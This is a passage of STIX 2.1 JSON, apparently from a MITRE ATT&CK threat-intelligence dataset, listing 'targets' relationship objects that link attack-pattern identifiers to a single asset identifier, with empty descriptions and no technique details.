"relationship--04d5e20a-0eee-40af-a269-6d647d470f64", "created": "2024-07-01T10:37:15.831461", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831463", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ede255c-f05c-4fcf-9e4e-cd4c5c62583c", "created": "2024-07-01T10:37:15.831471", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831473", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b9b3ca8-0e8f-416f-ab9f-6b72d57a1791", "created": "2024-07-01T10:37:15.831480", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831482", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a89861c-0781-4b23-809c-1478388831ce", "created": "2024-07-01T10:37:15.831490", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831493", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19ae0f95-e181-4920-9cf9-36c468f0ae8a", "created": "2024-07-01T10:37:15.831500", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831502", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--998456a3-a096-40c0-b0f7-562cb902e7b2", "created": "2024-07-01T10:37:15.831510", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831512", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4890e696-bee8-4eee-8f44-d4a28381e193", "created": "2024-07-01T10:37:15.831520", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831522", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51c8b886-2246-4e94-8942-a3463ec7b4f9", "created": "2024-07-01T10:37:15.831530", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831532", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b6cb44c-1370-4fda-b90b-a7b63a469f60", "created": "2024-07-01T10:37:15.831540", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831542", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f825d7f7-5294-433f-b0a9-01b13b9359d5", "created": "2024-07-01T10:37:15.831550", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831552", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--520529e6-d09d-42fc-87a3-b19764a49a6f", "created": "2024-07-01T10:37:15.831559", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831561", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f22c208a-acdc-4066-97d5-ec22b4b47d38", "created": "2024-07-01T10:37:15.831569", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831572", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de4aaf7d-12ea-4c73-910a-ffe6a6be7858", "created": "2024-07-01T10:37:15.831579", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831582", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--989e3f43-29b2-4e3f-9cf3-0d247291d59a", "created": "2024-07-01T10:37:15.831589", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831592", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aaf1ce09-29aa-4a9c-b376-dab38fc75516", "created": "2024-07-01T10:37:15.831603", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831605", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca8f96c6-0a0d-4260-a9aa-de09e6f0a3de", "created": "2024-07-01T10:37:15.831613", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831615", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e8698d3-5d85-4ab6-a60e-cc181f9cc8eb", "created": "2024-07-01T10:37:15.831623", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831625", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e521db84-5ad2-41fd-874f-f6f79cd3eec0", "created": "2024-07-01T10:37:15.831633", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831635", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--410c0de8-8ded-4d08-afba-b314c3e1cfff", "created": "2024-07-01T10:37:15.831642", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831644", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e3b6e88-8bbe-451f-a574-64199123cfe5", "created": "2024-07-01T10:37:15.831652", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831654", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--656a0258-60fd-4364-8d1b-9bcf4ff7bc39", "created": "2024-07-01T10:37:15.831662", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831665", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--63aa2770-6df9-45fa-a563-6d0b7658c4a4", "created": "2024-07-01T10:37:15.831672", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831675", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf13a25c-f6d0-458d-beb1-9d1f8dfb2104", "created": "2024-07-01T10:37:15.831682", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831684", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--771af044-3f49-4964-9079-fe563a9601a8", "created": "2024-07-01T10:37:15.831692", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831694", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aefd75c5-3a01-4ea2-aa25-4953cc6e3897", "created": "2024-07-01T10:37:15.831702", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831704", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5fb8c78-1367-452c-b65e-8b15be69c7e9", "created": "2024-07-01T10:37:15.831712", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831714", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fb31b4f0-f4e1-4a9c-9046-0555ee07cc1c", "created": "2024-07-01T10:37:15.831722", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831724", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b478a95a-3391-41bf-b887-b93ba1c86359", "created": "2024-07-01T10:37:15.831732", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831734", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b97a424-10bb-4ab1-99c4-274f8cf0494d", "created": "2024-07-01T10:37:15.831742", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831744", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65918b8a-edab-4bcd-9b66-8dad7b00b4c5", "created": "2024-07-01T10:37:15.831751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9af8e8c5-2e93-4712-8183-bc62e04db4a9", "created": "2024-07-01T10:37:15.831761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bcb56703-e8ac-4803-92e7-2e41fa7aff60", "created": "2024-07-01T10:37:15.831771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2b3cf87-2903-480e-b98a-9812c4b56361", "created": "2024-07-01T10:37:15.831781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831784", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b9cf65e-f4a0-49c4-b1c6-2a0ae6c37b34", "created": "2024-07-01T10:37:15.831833", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831835", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cfd1bd5-ad03-454f-8428-777a627efd0d", "created": "2024-07-01T10:37:15.831844", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831846", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--494db431-8b30-4cd2-ae81-44c744c74f5c", "created": "2024-07-01T10:37:15.831854", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831856", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28f82d11-d40d-41d4-bc48-525d4ba09b22", "created": "2024-07-01T10:37:15.831865", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831867", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--537987cc-1a89-4b7f-a91e-a6c993e707bb", "created": "2024-07-01T10:37:15.831875", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831877", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25ec6ca7-ecc6-4f70-954a-23db4902a125", "created": "2024-07-01T10:37:15.831885", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831887", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae859d6f-395e-45d9-a0f6-f78a986b9d9a", "created": "2024-07-01T10:37:15.831895", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831897", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a15517e7-8c3c-4eea-ab01-dcd57a85fb08", "created": "2024-07-01T10:37:15.831905", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831907", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f9bc907-5043-4b22-bcdf-de57316dc767", "created": "2024-07-01T10:37:15.831916", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], 